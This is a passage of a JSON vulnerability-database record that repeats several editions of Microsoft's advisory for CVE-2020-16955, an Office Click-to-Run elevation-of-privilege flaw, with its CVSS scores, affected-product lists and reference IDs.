Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-06T18:44:58", "differentElements": ["msAffectedSoftware"], "edition": 18}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "11729814de529eab7b78202bfda89574", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-07T08:43:26", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-07T08:43:26", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-07T08:43:26", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-07T08:43:26", "differentElements": ["msAffectedSoftware"], "edition": 19}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "3ef380d1ad5cccc89011d4f3166318f2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-07T10:44:11", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-07T10:44:11", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-07T10:44:11", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-07T10:44:11", "differentElements": ["msAffectedSoftware"], "edition": 20}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "11729814de529eab7b78202bfda89574", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-08T14:45:07", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-08T14:45:07", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-08T14:45:07", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-08T14:45:07", "differentElements": ["msAffectedSoftware"], "edition": 21}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "3ef380d1ad5cccc89011d4f3166318f2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-08T16:54:32", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-08T16:54:32", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-08T16:54:32", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-08T16:54:32", "differentElements": ["msAffectedSoftware"], "edition": 22}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "11729814de529eab7b78202bfda89574", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-09T05:01:50", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-08T16:54:32", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-08T16:54:32", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-09T05:01:50", "differentElements": ["msAffectedSoftware"], "edition": 23}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "3ef380d1ad5cccc89011d4f3166318f2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-09T06:50:14", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-09T06:50:14", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-09T06:50:14", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-09T06:50:14", "differentElements": ["msAffectedSoftware"], "edition": 24}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "11729814de529eab7b78202bfda89574", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-10T08:45:22", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-09T06:50:14", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-09T06:50:14", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-10T08:45:22", "differentElements": ["msAffectedSoftware"], "edition": 25}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "3ef380d1ad5cccc89011d4f3166318f2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-10T10:44:19", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-09T06:50:14", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-09T06:50:14", "rev": 2}}, 